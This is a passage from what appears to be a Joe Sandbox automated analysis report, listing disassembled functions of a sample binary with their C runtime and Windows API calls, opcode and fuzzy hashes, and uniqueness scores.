                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E519,00000001,?,?,?,00C0ED81,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C0E5F7
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • API String ID: 2417226690-0
                                  • Opcode ID: df51725714ab6da7b0989b356e81530f4598e64f95227eac95601689ce38be62
                                  • Instruction ID: 19b2cdd4f6ae9fa865db564eba62940eed3cb2445c723cae5b18c096867dad6d
                                  • Opcode Fuzzy Hash: df51725714ab6da7b0989b356e81530f4598e64f95227eac95601689ce38be62
                                  • Instruction Fuzzy Hash: 82F0553A34020597CB14AF35EC09B6A7F94EFC1B18B064469FA058B681D672A942C750
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C04DD0,?,20001004,00000000,00000002,?,?,00C043BB), ref: 00C098EC
                                  Similarity
                                  • API ID: InfoLocale
                                  • API String ID: 2299586839-0
                                  • Opcode ID: b16d251bc493170cbf524593a4d74629491b84b5913319d160cc2347ef5a1a60
                                  • Instruction ID: e7ad1c3e9b091d29d562eda055a0f4885f060329f07ff2e685477a02cb090230
                                  • Opcode Fuzzy Hash: b16d251bc493170cbf524593a4d74629491b84b5913319d160cc2347ef5a1a60
                                  • Instruction Fuzzy Hash: 88E04F35501229BBCF122F61DC08BAE7E15FF46760F10C020FC15652A2CB328D21FAD1
                                  Uniqueness
                                  • Uniqueness Score: 0.00%

                                  Similarity
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3092a08b5cda45da8146f69f3b6bc8e1c239cc9c630920a4fda231155f3a6b0b
                                  • Instruction ID: 1db032322789cd77fb7eab9a5eabf1de6c034487fee98c34d116c28f3f32890a
                                  • Opcode Fuzzy Hash: 3092a08b5cda45da8146f69f3b6bc8e1c239cc9c630920a4fda231155f3a6b0b
                                  • Instruction Fuzzy Hash: 4561337060020C96DF38AA68C8D5FBEB3E5EF41740F5445EEE782EB28ADB619D4D8741
                                  Uniqueness
                                  • Uniqueness Score: 0.03%

                                  Similarity
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 828d8bd026309c7d52753bc7c42c3f20843970e8911ce645460bed6582189f82
                                  • Instruction ID: 142182ae09262a4c4aebfd8e709892e4059cccc76ee61ae5be72178ec4682ce5
                                  • Opcode Fuzzy Hash: 828d8bd026309c7d52753bc7c42c3f20843970e8911ce645460bed6582189f82
                                  • Instruction Fuzzy Hash: 9951137060064C96DB38AA68C9D6FBE6BDEDF81380F1844DEE78297692C7519D4CC352
                                  Uniqueness
                                  • Uniqueness Score: 0.03%

                                  Strings
                                  • GetSystemTimePreciseAsFileTime, xrefs: 00C09907
                                  Similarity
                                  • String ID: GetSystemTimePreciseAsFileTime
                                  • API String ID: 0-595813830
                                  • Opcode ID: 457791947d231753c4243e01f4bbf3cb2961e72d73e1f7476684dbe6fe4a0cfe
                                  • Instruction ID: 32ad0f9b876275e405d12e159911554d9583bcb44cace8eb87b9724facfb68d7
                                  • Opcode Fuzzy Hash: 457791947d231753c4243e01f4bbf3cb2961e72d73e1f7476684dbe6fe4a0cfe
                                  • Instruction Fuzzy Hash: 3EE0C236681238B3C2102291BC06BEDBA04D742FB1F144033FA08655A2D9B10810D6D2
                                  Uniqueness
                                  • Uniqueness Score: 4.01%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  APIs
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  Uniqueness

                                  Uniqueness Score: 0.67%

                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 00C0D949
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB22
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB34
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB46
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB58
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB6A
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB7C
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CB8E
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBA0
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBB2
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBC4
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBD6
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBE8
                                    • Part of subcall function 00C0CB05: _free.LIBCMT ref: 00C0CBFA
                                  • _free.LIBCMT ref: 00C0D93E
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0D960
                                  • _free.LIBCMT ref: 00C0D975
                                  • _free.LIBCMT ref: 00C0D980
                                  • _free.LIBCMT ref: 00C0D9A2
                                  • _free.LIBCMT ref: 00C0D9B5
                                  • _free.LIBCMT ref: 00C0D9C3
                                  • _free.LIBCMT ref: 00C0D9CE
                                  • _free.LIBCMT ref: 00C0DA06
                                  • _free.LIBCMT ref: 00C0DA0D
                                  • _free.LIBCMT ref: 00C0DA2A
                                  • _free.LIBCMT ref: 00C0DA42
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  APIs
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00BF9323
                                  • type_info::operator==.LIBVCRUNTIME ref: 00BF934A
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00BF9456
                                  • CatchIt.LIBVCRUNTIME ref: 00BF94AB
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00BF9531
                                  • _UnwindNestedFrames.LIBCMT ref: 00BF95B8
                                  • CallUnexpected.LIBVCRUNTIME ref: 00BF95D3
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 4234981820-393685449
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00C13CC1: CreateFileW.KERNEL32(00000000,00000000,?,00C14023,?,?,00000000,?,00C14023,00000000,0000000C), ref: 00C13CDE
                                  • GetLastError.KERNEL32 ref: 00C1408E
                                  • __dosmaperr.LIBCMT ref: 00C14095
                                  • GetFileType.KERNEL32(00000000), ref: 00C140A1
                                  • GetLastError.KERNEL32 ref: 00C140AB
                                  • __dosmaperr.LIBCMT ref: 00C140B4
                                  • CloseHandle.KERNEL32(00000000), ref: 00C140D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00C14221
                                  • GetLastError.KERNEL32 ref: 00C14253
                                  • __dosmaperr.LIBCMT ref: 00C1425A
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  APIs
                                  • _free.LIBCMT ref: 00C06E6B
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C06E77
                                  • _free.LIBCMT ref: 00C06E82
                                  • _free.LIBCMT ref: 00C06E8D
                                  • _free.LIBCMT ref: 00C06E98
                                  • _free.LIBCMT ref: 00C06EA3
                                  • _free.LIBCMT ref: 00C06EAE
                                  • _free.LIBCMT ref: 00C06EB9
                                  • _free.LIBCMT ref: 00C06EC4
                                  • _free.LIBCMT ref: 00C06ED2
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,$array$object$object key$object separator$value
                                  • API String ID: 0-1191195158
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6A27
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF6A2F
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6AB8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF6AE3
                                  • _ValidateLocalCookies.LIBCMT ref: 00BF6B38
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 0-537541572
                                  Uniqueness

                                  Uniqueness Score: 0.38%

                                  APIs
                                    • Part of subcall function 00C0D232: _free.LIBCMT ref: 00C0D257
                                  • _free.LIBCMT ref: 00C0D534
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0D53F
                                  • _free.LIBCMT ref: 00C0D54A
                                  • _free.LIBCMT ref: 00C0D59E
                                  • _free.LIBCMT ref: 00C0D5A9
                                  • _free.LIBCMT ref: 00C0D5B4
                                  • _free.LIBCMT ref: 00C0D5BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction ID: 56955bcdcf579eca3fd71b788ea813ec6987de44be321843d8929bca334c310c
                                  • Opcode Fuzzy Hash: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction Fuzzy Hash: 9F116A71585B04EADA20BBF0DC07FCB779DAF01700F408C25B29BA60D2DA24FA15E765
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • GetConsoleCP.KERNEL32(00C01707,00000000,?), ref: 00C0807A
                                  • __fassign.LIBCMT ref: 00C08259
                                  • __fassign.LIBCMT ref: 00C08276
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C082BE
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C082FE
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C083AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                  • String ID:
                                  • API String ID: 4031098158-0
                                  • Opcode ID: ebd4bcd1c19ade7974fd106217de7acebe6861305b71e7734b2de3ad5921053f
                                  • Instruction ID: c5bd36593be7589d1657f2db8b5d0360eb90a660ef24981f47cd895384faa0f3
                                  • Opcode Fuzzy Hash: ebd4bcd1c19ade7974fd106217de7acebe6861305b71e7734b2de3ad5921053f
                                  • Instruction Fuzzy Hash: E2D19E71D002589FCF15CFA8C980AEDBBB5BF48710F288169E895F7391DA309A4ACF50
                                  Uniqueness

                                  Uniqueness Score: 0.81%

                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB5A7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB5BD
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB9F7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEBA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 23600c08db850a826eef536de007d7ad6c5b446380cdb6ac3df89bb0d96ca2a4
                                  • Instruction ID: 5e83a61e19299f295bd9a121b3db0772a3785394698c7f9229cdfd1bd9de971c
                                  • Opcode Fuzzy Hash: 23600c08db850a826eef536de007d7ad6c5b446380cdb6ac3df89bb0d96ca2a4
                                  • Instruction Fuzzy Hash: FC22AF709002998FDF28DF25C894BEEBBB5AF45300F1482D9E459A7782DB749E88CF51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • _free.LIBCMT ref: 00C030EC
                                  • _free.LIBCMT ref: 00C03107
                                  • _free.LIBCMT ref: 00C03112
                                  • _free.LIBCMT ref: 00C0321F
                                    • Part of subcall function 00C06876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  • _free.LIBCMT ref: 00C031F4
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C03215
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Heap$AllocateErrorFreeLast
                                  • String ID:
                                  • API String ID: 4150789928-0
                                  • Opcode ID: 188f701c1f77bcc6224be510d04dfff20d4149ac8fcf7266c66637a36a71e207
                                  • Instruction ID: f4e03a2dbb0f6a43463a6a98fcdf4cb4d8cbfc8558b47b9c3b2591ca089e64a0
                                  • Opcode Fuzzy Hash: 188f701c1f77bcc6224be510d04dfff20d4149ac8fcf7266c66637a36a71e207
                                  • Instruction Fuzzy Hash: 56519C3AA042506BDF14AFB89842BBE77ADDF85710F244059F951DB2C2EA32DF02D360
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9CF0
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9D12
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE9D32
                                  • __Getctype.LIBCPMT ref: 00BE9DCB
                                  • std::_Facet_Register.LIBCPMT ref: 00BE9DEA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE9E02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                  • String ID:
                                  • API String ID: 1102183713-0
                                  • Opcode ID: 1f6fdf7a85c295be51d438303d8b6d4f35065f8f32fa54da0ec65ce4528030d5
                                  • Instruction ID: 497f865854fdfc3e542e6445b5b2a792faa6ce3cb32a494ac86e942776d4078e
                                  • Opcode Fuzzy Hash: 1f6fdf7a85c295be51d438303d8b6d4f35065f8f32fa54da0ec65ce4528030d5
                                  • Instruction Fuzzy Hash: DE419D71900668DBCB21DF19DC81BAEB7F4EB14710F2481B9E945AB391EB30AD49CBD1
                                  Uniqueness

                                  Uniqueness Score: 1.47%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,00BF8EB1,00BF70D0,00BF4FB8), ref: 00BF8EC8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF8ED6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF8EEF
                                  • SetLastError.KERNEL32(00000000,00BF8EB1,00BF70D0,00BF4FB8), ref: 00BF8F41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: d2c1b4ab2e239666d12ad2f9bec2c4ffc0c82e029dc89cc3d048ff36f3c5f082
                                  • Instruction ID: 0ff35470c733b2c47776e5ef3c32264a80b3b42210eb917b2698d786ea231223
                                  • Opcode Fuzzy Hash: d2c1b4ab2e239666d12ad2f9bec2c4ffc0c82e029dc89cc3d048ff36f3c5f082
                                  • Instruction Fuzzy Hash: E401FC322293195D97241775BCC5B7E2AD5EB0637473007AAF314674E0EF618C0BA145
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00BFA04F,?,?,00C2F874,00000000,?,00BFA17A,00000004,InitializeCriticalSectionEx,00C1E0F4,00C1E0FC,00000000), ref: 00BFA01E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: 618ef789e296b8d996ae03dba93b441024c7406551fe7c9303ccd79e43cf37e2
                                  • Instruction ID: 220693adcf47c12b3ac8785cf9a9b3fe128e4262c9080a749a0d108a57310455
                                  • Opcode Fuzzy Hash: 618ef789e296b8d996ae03dba93b441024c7406551fe7c9303ccd79e43cf37e2
                                  • Instruction Fuzzy Hash: 1611E371A01229EBCB224B78AC447AD37E4EF06760F2541A0EB04FB280DA75FC0896D2
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00C02B94,00000000,?,00C02B5C,?,?,00000000), ref: 00C02BB4
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C02BC7
                                  • FreeLibrary.KERNEL32(00000000,?,?,00C02B94,00000000,?,00C02B5C,?,?,00000000), ref: 00C02BEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 425b2059c6e8585c488e1117768be9ffac15a927e0e0901fb39e47eeeccf24d5
                                  • Instruction ID: e087d94d1b256f6d2e2df321670f806a1c78e09538c6883dcddf01da89afbe6f
                                  • Opcode Fuzzy Hash: 425b2059c6e8585c488e1117768be9ffac15a927e0e0901fb39e47eeeccf24d5
                                  • Instruction Fuzzy Hash: 96F01C31506219FBDF11AF91DC0EBDE7B68FB02755F248060E806A21A0CB709F41EA95
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • _free.LIBCMT ref: 00C04CF9
                                  • _free.LIBCMT ref: 00C04D12
                                  • _free.LIBCMT ref: 00C04D50
                                  • _free.LIBCMT ref: 00C04D59
                                  • _free.LIBCMT ref: 00C04D65
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast
                                  • String ID:
                                  • API String ID: 3291180501-0
                                  • Opcode ID: d12cfb22ca7cfabd9b3543f976b9a6cca7387d74ad041b3771f0ef4f1b78d097
                                  • Instruction ID: ba9abc26b9586c74ae238fc9c3dfe0a02c77c7ecb04ca961ca1d1a9f05ac2e3c
                                  • Opcode Fuzzy Hash: d12cfb22ca7cfabd9b3543f976b9a6cca7387d74ad041b3771f0ef4f1b78d097
                                  • Instruction Fuzzy Hash: 53B12FB5A012199FDB28DF18C884BAEB7B4FF48314F1445EAE949A7390D771AE90CF40
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                    • Part of subcall function 00C0690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C0693F
                                  • _free.LIBCMT ref: 00C04670
                                  • _free.LIBCMT ref: 00C04687
                                  • _free.LIBCMT ref: 00C046A4
                                  • _free.LIBCMT ref: 00C046BF
                                  • _free.LIBCMT ref: 00C046D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 45588ea89d4668b0e037d21236089d4f36505f99e27f14c9babe03a345d23a4a
                                  • Instruction ID: 73ab3deb11306038716b56ebe3dbd111bf820c62815e6e8ae2af261d5f57b09a
                                  • Opcode Fuzzy Hash: 45588ea89d4668b0e037d21236089d4f36505f99e27f14c9babe03a345d23a4a
                                  • Instruction Fuzzy Hash: 5251C0B2A00604EFDB28DF69DC41A6BB7F4EF49720B144669F519D72D0E732EA01DB90
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BEA78D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BEA7AD
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEA7CD
                                  • std::_Facet_Register.LIBCPMT ref: 00BEA86B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEA883
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: e402af3284efea87713c83355849c6270cc29a97dde739a87dcae7e6a75fd0f1
